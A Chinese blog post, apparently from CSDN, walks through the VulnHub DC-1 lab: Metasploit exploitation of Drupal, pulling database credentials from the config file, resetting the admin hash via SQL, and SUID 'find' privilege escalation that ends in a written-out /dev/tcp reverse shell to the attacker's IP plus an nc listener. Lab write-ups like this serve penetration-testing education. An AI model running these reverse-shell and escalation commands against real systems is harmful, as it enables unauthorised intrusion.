vulnhub靶机DC1

最新推荐文章于 2024-04-18 13:20:33 发布
最新推荐文章于 2024-04-18 13:20:33 发布
阅读量949 收藏 7
点赞数
分类专栏: vulnhub 文章标签: vulnhub 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52450702/article/details/127579440
版权

靶机DC1下载地址:https://www.vulnhub.com/entry/dc-1,292/
kali ip:192.168.70.129
靶机DC1IP:192.168.70.160

一、信息搜集

靶机ip发现
在这里插入图片描述

端口扫描
在这里插入图片描述

进行目录扫描,并没发现什么可以利用的目录

二、漏洞利用

使用msf查找drupal的漏洞
命令:search drupal
在这里插入图片描述

这里选择一个最新的漏洞,设置rhost即可
在这里插入图片描述

成功接收会话
在这里插入图片描述

查看flag1
在这里插入图片描述

所有好的cmd都需要一个配置文件,和你一样
查到drupal的配置文件所在目录为:/var/www/sites/default/
查看配置文件
在这里插入图片描述

暴力破解和字典攻击不是
*只有获得访问权限的方式(您将需要访问权限)。

  • 您可以使用这些凭据执行哪些操作?
    在这里插入图片描述

再往下看到mysql的账号密码

Username:dbuser Passwd:R0ck3t

使用python开一个交互式窗口并进行mysql连接

python -c ‘import pty; pty.spawn(“/bin/bash”)’

在这里插入图片描述

查询drupaldb数据库和表users
在这里插入图片描述

发现账号密码
在这里插入图片描述

发现密码是加密的,这里可以选择对账号的密码进行替换

www-data@DC-1:/var/www$ php scripts/password-hash.sh ycx
password: ycx hash:
S S SDmVn5QNQW0UeWa6YUX2dKoAlRmmo3KsYuEMb1OstHXhC0AMEwe5D

在这里插入图片描述

查看users的表结构
在这里插入图片描述

使用update将admin的数据进行替换
在这里插入图片描述

也可以使用脚本进行攻击,这样更方便一些
在这里插入图片描述

这里只测试了自带的重置密码
这里就修改成功了,登录一下网页试试看

在这里插入图片描述

在网页中的dashbroad找到flag3
在这里插入图片描述

特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取shadow中的东西。
查看passwd和shadow文件
在这里插入图片描述

查看shadow权限不足
从passwd得知flag4
在flag4的账户中找到flag4
在这里插入图片描述

三、提权

可以使用LinEnum脚本进行扫描
使用find命令查找有root权限文件
发现命令find可以提权
在这里插入图片描述

 find `which find` -exec whoami \;

#命令解释: 以find 命令 执行 whoami 命令。 # find (一个路径或文件必须存在) -exec 执行命令 (结束);

find反弹shell

find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.70.129/9999 0>&1 \;

使用nc接收反弹会话
nc -lvvp 9999

在这里插入图片描述

Ie802.3
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
网络安全零基础入门】002、OWASP靶机下载与安装(超详细,亲测可用)
热爱技术,热爱生活
07-23 1995
OWASP靶机下载与安装(超详细,亲测可用)
Vulnhub】之Nagini
zg_111的博客
04-13 1380
根据之前得到的bak配置文件,我们知道服务器启用了Mysql数据库,并且用户名为goblin,密码为空,接下来我们可以使用gopher协议查询Joomla的后台管理员账密,从而登陆至Web后台进行下一步操作。在hermoine用户文件夹下,我们发现了隐藏的文件夹.mozilla,该文件夹是在linux操作系统中使用firefox浏览器后,在当前用户的目录下就会生成给.mozilla目录,进入该文件夹,可以发现当前浏览器中的安装的扩展包、配置信息及包括浏览器登录某些web应用后记录下的用户名和密码信息。
Vulnhub靶机下载和使用
laoyanCZ的博客
11-26 1018
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
vulnhub靶机corrosion1
weixin_52450702的博客
11-18 692
vulnhub靶机corrosion1
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2082
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
MS08-067靶机下载
边城浪子的博客
09-08 1673
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
DC靶场系列--DC1
BGiscool的博客
06-28 4889
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1503
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
vulnhub靶场,DC-9
kukudeshuo的博客
07-17 900
vulnhub靶场,DC-9 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-9(192.168.58.155) 下载靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.155 使用nmap扫描查看目标靶机端口开放情况 可以看到扫描结果是开放了22、80端口,但是22端口被过滤了 浏览器访问目标靶机80端口 使用浏览器插件wappal
DC-3靶机
Flamingo1998的博客
02-16 460
DC-3靶机
OWASP靶机下载安装
最新发布
m0_63602484的博客
04-18 824
第一次安装这个靶机的时候,发现靶机未显示ip地址,我也是通过自行配置ip地址才解决了无法访问的问题。2. 下载完成后,解压缩(这里自行创建目录文件即可,注意:路径中尽量不要出现中文字符)1. 开启VM虚拟机,选择打开虚拟机,选中刚才安装的OWASP靶机的.vmx文件即可。4. 输入账户和密码(这里提示用户名为:root,密码为:owaspbwa)2. 开启OWASP虚拟机,这里网络适配器应为NAT模式。6.通过浏览器访问OWASP靶机的web界面。3. 选择我已复制该虚拟机。
靶机渗透(一)——bulldog2
qq_45751902的博客
04-16 2227
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,并且修改靶机的网络,注意红框,下面能用到 修改完打开就是这样的 三、kali攻击机 打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称) 四、攻击 1.在kali上查看ip ifconfig 发现ip地址为192.1
Vulnhub靶机:hacksudo-Thor
qq_48904485的博客
02-09 984
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo—Thor.zip。
关于HackMyMV靶场的靶机网络配置与下载
weixin_58368471的博客
06-10 911
BOX的适配问题
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值